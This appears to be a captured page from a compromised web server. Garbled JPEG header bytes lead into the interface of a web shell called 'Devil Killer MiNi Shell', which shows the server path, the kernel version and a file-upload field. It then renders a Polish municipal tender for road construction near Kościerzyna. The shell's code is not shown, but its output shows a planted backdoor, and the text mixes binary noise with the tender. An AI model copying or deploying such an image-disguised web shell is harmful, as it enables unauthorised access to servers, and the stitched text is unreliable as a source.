JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019799502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa i rozbudowa drogi gminnej na odcinku Korne – Owśnice oraz przebudowa odcinka drogi gminnej ul. Stolema w m. Wdzydze, gm. Kościerzyna” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KOMUNALNY GMINY KOŚCIERZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 190597909</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kościerzyna-Stare Nadleśnictwo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zkgk@koscierzyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.koscierzyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa i rozbudowa drogi gminnej na odcinku Korne – Owśnice oraz przebudowa odcinka drogi gminnej ul. Stolema w m. Wdzydze, gm. Kościerzyna” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b60129c1-21d6-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00197995</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002120/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa drogi gminnej we Wdzydzach - ul. Stolema na terenie gminy Kościerzyna.</p> <p class="mb-0">1.1.10 Budowa i rozbudowa drogi gminnej na odcinku Korne – Owśnice, gm. Kościerzyna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl<br/>https://epuap.gov.pl/wps/portal zkgk@kościerzyna.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musiposiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy:złożenia, zmiany i wycofania oferty oraz do formularza do komunikacji. 2. Wymagania<br/>techniczne iorganizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych<br/>odwzorowańdokumentów oraz informacji przekazywanych przy ich użyciu zostały opisane w<br/>Regulaminiekorzystania z miniPortalu ttps://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie<br/>ePUAPhttps://www.gov.pl/web/gov/warunki-korzystania 3. Wykonawca przystępując do<br/>niniejszegopostępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu,określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu<br/>przestrzegaćpostanowień tego regulaminu. 4. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwemdedykowanych formularzy do: - złożenia, zmiany i wycofania oferty oraz do komunikacji<br/>wynosi 150 MB- e-mail: zkgk@koscierzyna.pl pojemność jednej wiadomości na skrzynce – do 20 MB5.<br/>Za datęprzekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych<br/>informacjiprzyjmuje się datę ich przekazania na ePUAP, a w przypadku przekazywania tych<br/>dokumentów orazinformacji za pomocą poczty elektronicznej – datą ich przesłania będzie<br/>potwierdzenie dostarczeniawiadomości zawierającej dokument/informację z serwera pocztowego<br/>Zamawiającego. 6. Wpostępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami wszczególności składanie dokumentów elektronicznych (innych niż oferta oraz<br/>załączniki do oferty),cyfrowych odwzorowań dokumentów oraz przekazywanie informacji odbywa się<br/>elektronicznie zapośrednictwem dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przezminiPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej z niniejszympostępowaniem Zamawiający i Wykonawcy posługują się oznaczeniem sprawy i numerem<br/>ogłoszenia(BZP). Zamawiający może również komunikować się z Wykonawcami za pomocą poczty<br/>elektronicznej, email: zkgk@koscierzyna.pl 7. Dokumenty elektroniczne (inne niż oferta oraz<br/>załącznikido oferty) oraz cyfrowe odwzorowanie dokumentów składane są przez Wykonawcę za<br/>pośrednictwemFormularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość<br/>składania w/wdokumentów elektronicznych oraz cyfrowych odwzorowań dokumentów za pomocą<br/>pocztyelektronicznej, na adres email: zkgk@koscierzyna.pl8. Sposób sporządzania<br/>dokumentówelektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgodny z<br/>wymaganiamiokreślonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobusporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznychoraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lubkonkursu . a)Dokumenty lub oświadczenia, wykonawca składa w oryginale<br/>lub kopii poświadczonej zazgodność z oryginałem w formie elektronicznej, w postaci elektronicznej<br/>opatrzonej podpisemzaufanym lub podpisem osobistym. Jeżeli oryginał dokumentu lub oświadczenia<br/>nie zostałysporządzone w postaci dokumentu elektronicznego, wykonawca może sporządzić i<br/>przekazaćelektroniczną kopię posiadanego dokumentu lub oświadczenia. W przypadku przekazywania<br/>przezwykonawcę elektronicznej kopii dokumentu lub oświadczenia, opatrzenie jej kwalifikowanym<br/>podpisemelektronicznym, podpisem zaufanym lub podpisem osobistym przez wykonawcę jest<br/>równoznaczne zpoświadczeniem elektronicznej kopii dokumentu lub oświadczenia za zgodność z<br/>oryginałem.b)Formaty plików muszą być zgodne z krajowymi Ramami Interoperacyjności<br/>ROZPORZĄDZENIERADY MINISTRÓW z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności,minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z zapisami rozdziału III SWZ - klauzula<br/>informacyjna RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z zapisami rozdziału III SWZ - klauzula<br/>informacyjna RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.05.2021.MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Budowa i rozbudowa drogi gminnej na odcinku Korne – Owśnice"<br/><br/>Część 1: Budowa i rozbudowa drogi gminnej na odcinku Korne – Owśnice, gm. Kościerzyna.<br/><br/>Przedmiotem zamówienia jest zamierzenie inwestycyjne pn. „Budowa i Rozbudowa drogi gminnej na odcinku Korne - Owśnice w Gminie Kościerzyna” polegające na budowie i rozbudowie drogi gminnej, której rozpoczęcie będzie w miejscowości Korne w obrębie skrzyżowania z drogą krajową nr 20. Zakończenie budowy nastąpi w miejscowości Owśnice w obrębie skrzyżowania z drogą powiatową nr 1931G.<br/><br/>Zakres robót objętych projektem:<br/>−	roboty przygotowawcze i pomiarowe, <br/>−	wycinkę drzew i krzewów, <br/>−	roboty rozbiórkowe (rozbiórka nawierzchni), <br/>−	roboty ziemne powierzchniowe wykonywane mechanicznie (usunięcie humusu, koryto pod konstrukcję nawierzchni ścieżki i zjazdów, nasypy), <br/>−	ułożenie krawężników i opornika betonowego w miejscach wyznaczonych w projekcie, <br/>−	wykonanie podbudowy pomocniczej z mieszanki związanej cementem C3/4,<br/>−	wykonanie podbudowy zasadniczej z mieszanki niezwiązanej C50/30, <br/>−	ułożenie warstwy podbudowy z betonu asfaltowego, <br/>−	ułożenie geosyntetyku przeciwspękaniowego, <br/>−	ułożenie warstwy wiążącej z betonu asfaltowego, <br/>−	ułożenie warstwy ścieralnej z betonu asfaltowego, <br/>−	ułożenie nawierzchni zjazdów z betonu asfaltowego oraz kostki betonowej, <br/>−	humusowanie i obsianie skarp i poboczy, <br/>−	montaż oznakowania pionowego, <br/>−	wykonanie kanału technologicznego<br/><br/><br/>Zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie przyjęto następujące parametry:<br/>•	długość projektowanej rozbudowy drogi 2 +290,66 m.b.,<br/>•	długość projektowanej budowy drogi 1+569,13 m.b.,<br/>•	szerokość jezdni drogi – 6,00 m.b.,<br/>•	szerokość poboczy – 1,00 m.b.,<br/>•	spadek poprzeczny 2-6%,<br/>•	spadek podłużny zgodnie z profilem podłużnym,<br/>•	szerokość zjazdów 4,0 - 5,0 m.b. zgodnie z częścią rysunkową,<br/>•	pochylenie skarp 1:1,5,<br/>•	szerokość dna rowu 40 cm.<br/><br/><br/>Dla kategorii ruchu KR3 na podłożu G1 przyjęto następującą konstrukcję nawierzchni drogi:<br/>•	4 cm warstwa ścieralna z betonu asfaltowego AC 11S<br/>•	5 cm warstwa wiążąca z betonu asfaltowego AC 16W<br/>•	7 cm warstwa wiążąca z betonu asfaltowego AC 16P<br/>•	22 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C50/30<br/>•	15 cm podbudowa pomocnicza z mieszanki związanej C3/4.<br/><br/>Dla kategorii ruchu KR3 na podłożu G1 przyjęto następującą konstrukcję nawierzchni drogi (nakładka asfaltowa):<br/>•	4 cm warstwa ścieralna z betonu asfaltowego AC 11S<br/>•	5 cm warstwa wiążąca z betonu asfaltowego AC 16W<br/>•	geosyntetyk przeciwspękaniowy.<br/><br/>Dla kategorii ruchu KR2 na podłożu G1 przyjęto następującą konstrukcję nawierzchni zjazdów bitumicznych:<br/>•	4 cm warstwa ścieralna z betonu asfaltowego AC 11S<br/>•	5 cm warstwa wiążąca z betonu asfaltowego AC 16W<br/>•	22 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C50/30.<br/><br/>Dla kategorii ruchu KR2 na podłożu G1 przyjęto następującą konstrukcję nawierzchni zjazdów z kostki betonowej:<br/>•	8 cm kostka betonowa<br/>•	3 cm podsypka piaskowo – cementowa 1:4<br/>•	22 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C50/30.<br/><br/>Droga na całym odcinku będzie miała przekrój szlakowy. W obrębie zjazdów i skrzyżowań zaprojektowano umocnienie krawędzi jezdni opornikiem betonowym wtopionym 12x25x100 ułożonym na ławie betonowej oporem z betonu C-12/15. Zakończenia jezdni drogi zaprojektowano z krawężnika betonowego 15x30x100 ułożonego na płasko.<br/><br/>Obramowanie zjazdów z kostki oraz zjazdów publicznych zaprojektowano z opornika betonowego 12x25x100 ułożonego na ławie betonowej oporem z betonu C-12/15. Ustawienie krawężników na ławach betonowych wykonuje się na podsypce cementowo – piaskowej. Grubość warstwy podsypki powinna wynosić 5 cm. Światło krawężnika od strony najazdowej powinno wynosić 2 cm. Spoiny krawężników nie powinny przekraczać szerokości 1 cm.<br/><br/>W zakres robót wchodzi również wykonanie kanału technologicznego na długości 3 809,00 m.b z rury osłonowa 1 x ∅110mm/6,3mm (rura osłonowa pusta, w ziemi) wraz ze studniami SK-1 w ilości 43 sztuk. Rurociąg należy układać zgodnie z trasą wyznaczoną na rys. nr 2 4. Rurociąg powinien być ułożony na głębokości 0,8 m. Na końcach odcinka projektuje się studnie kablowe. Na skrzyżowaniach rurociągów z drogami, rowami i urządzeniami uzbrojenia terenu projektuje się rury ochronne RHDPE fi160mm/9,1mm (rura osłonowa pierwotna, w ziemi).<br/><br/>Dodatkowo Wykonawca zobowiązuje się do wykonania i montażu 2 szt. tablic informacyjnych zgodnie z wymaganiami określonymi w załącznika nr 6 do Uchwała nr 102 Rady Ministrów z dnia 23 lipca 2020 r. w sprawie wsparcia na realizację zadań inwestycyjnych przez jednostki samorządu terytorialnego. Zamawiający poda niezbędne informacje jakie muszą znaleźć się na tablicy. Wykonawca jest zobowiązany do uzyskania akceptacji Zamawiającego do projektu tablicy przed jej wykonaniem. Tablicę informacyjną należy umieścić w momencie rozpoczęcia inwestycji, w pobliżu miejsca wykonywania robót, w miejscu ogólnodostępnym i dobrze widocznym. <br/><br/>Szczegółowy opis przedmiotu zamówienia zawiera projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiące załączniki do niniejszej specyfikacji warunków zamówienia (dalej SWZ). Opis przedmiotu zamówienia został wskazany w załączniku nr 1 a </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">200 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie podlega oferta spełniająca wszystkie wymagania i warunki SWZ.<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu<br/>o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane<br/>zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, który<br/>uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Przebudowa odcinka drogi gminnej ul. Stolema w m. Wdzydze, gm. Kościerzyna.<br/>Przedmiotem zamówienia jest „Przebudowa odcinka drogi gminnej ul. Stolema w miejscowości Wdzydze Gmina Kościerzyna.”.<br/>Zakres inwestycji obejmuje:<br/>• roboty przygotowawcze i pomiarowe,<br/>• roboty rozbiórkowe,<br/>• roboty ziemne powierzchniowe wykonywane mechanicznie (wykopy, koryto pod konstrukcję chodnika, zjazdów i miejsc parkingowych),<br/>• ułożenie krawężnika i opornika betonowego,<br/>• wykonanie podbudowy pod chodnik, zjazdy i miejsca parkingowe,<br/>• obramowanie chodnika z obrzeża betonowego,<br/>• wykonanie nawierzchni chodnika, zjazdów i miejsc parkingowych,<br/>• wymianę warstwy ścieralnej na jezdni drogi,<br/>• odcinkowe poszerzenie jezdni drogi,<br/>• humusowanie i obsianie nasionami traw skarp i poboczy,<br/>• odcinkowe umocnienie skarp,<br/>• regulację studzienek teletechnicznych oraz kanalizacyjnych,<br/>• budowę kanału technologicznego.<br/>Przebudowa odcinka drogi gminnej polegać będzie na wykonaniu nowej nawierzchni asfaltowej (nakładka), nowej nawierzchni chodnika, zjazdów oraz miejsc parkingowych. Szerokość jezdni wynosi od 5,0 m.b. do 6,0 m.b., szerokość chodnika wynosi od 1,30 m do 2,00 m. Zaplanowano również wykonanie zjazdów na posesję. Niweletę krawężnika dostosowano do istniejącego terenu, planowanych zjazdów na posesje oraz do potrzeb odwodnienia. Szczegóły zagospodarowania terenu pokazano w części rysunkowej. Łączna długość przebudowywanej drogi wynosi 704,00 m.b.<br/>Zaprojektowano łącznie 125 miejsc parkingowych z czego 25 miejsc parkingowych z kruszywa na terenie działki 91/33, 38 miejsc parkingowych wzdłuż jezdni drogi gminnej, 62 miejsca parkingowe prostopadłe do drogi gminnej. Wymiary miejsc parkingowych wzdłuż drogi wynoszą 2.5 x 6.0 m.b., w poprzek drogi 2.5 x 5.0 m.b., W obrębie zjazdu do Stanicy Wodnej PTTK przewidziano 2 miejsca postojowe dla osób niepełnosprawnych. Odcinkowo przewidziano umocnienie skarp betonową płytą ażurową typu MEBA o wymiarach 60x40x10 cm z wypełnieniem otworów humusem i obsianiem nasionami traw.<br/>Przyjęto następującą konstrukcję nawierzchni drogi:<br/>• 5 cm warstwa ścieralna z betonu asfaltowego AC 11S,<br/>• geosyntetyk przeciwspękaniowy.<br/>Przyjęto następującą konstrukcję nawierzchni poszerzenia drogi:<br/>• 4 cm warstwa ścieralna z betonu asfaltowego AC 11S,<br/>• 5 cm po warstwa wiążąca z betonu asfaltowego AC 16W,<br/>• 22 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C50/30<br/>• 15 cm podbudowa pomocnicza mieszanka związana C1,5/2.<br/>Przyjęto następującą konstrukcję nawierzchni chodnika z kostki betonowej:<br/>• 6 cm kostka betonowa,<br/>• 3 cm podsypka piaskowo – cementowa 1:4,<br/>• 15 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C50/30.<br/>Przyjęto następującą konstrukcję nawierzchni zjazdów i miejsc parkingowych z kostki betonowej:<br/>• 8 cm kostka betonowa,<br/>• 3 cm podsypka piaskowo – cementowa 1:4,<br/>• 25 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C50/30.<br/>Przyjęto następującą konstrukcję nawierzchni miejsc parkingowych z kruszywa:<br/>• 5 cm warstwa grysu łamanego 8-16 mm,<br/>• 20 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C50/30,<br/>• 20 cm warstwa żwirowa,<br/>• grunt nasypowy dowożony.<br/>Obramowanie jezdni zaprojektowano z krawężnika betonowego 15x30x100, 22x15x100 (na zjazdach) oraz opornika betonowego 12x25x100 ułożonego na ławie betonowej oporem z betonu C-12/15. Światło krawężnika wynosi 12 cm., na zjazdach zastosować krawężnik najazdowy 22x15x100 o świetle 3 cm.<br/>Uwaga: Na łukach poziomych należy zastosować krawężniki łukowe.<br/>Na nawierzchnię chodników zastosować kostkę betonową o grubości 6 cm., na nawierzchnię zjazdów kostkę betonową o grubości 8 cm. Kolorystykę nawierzchni należy uzgodnić z 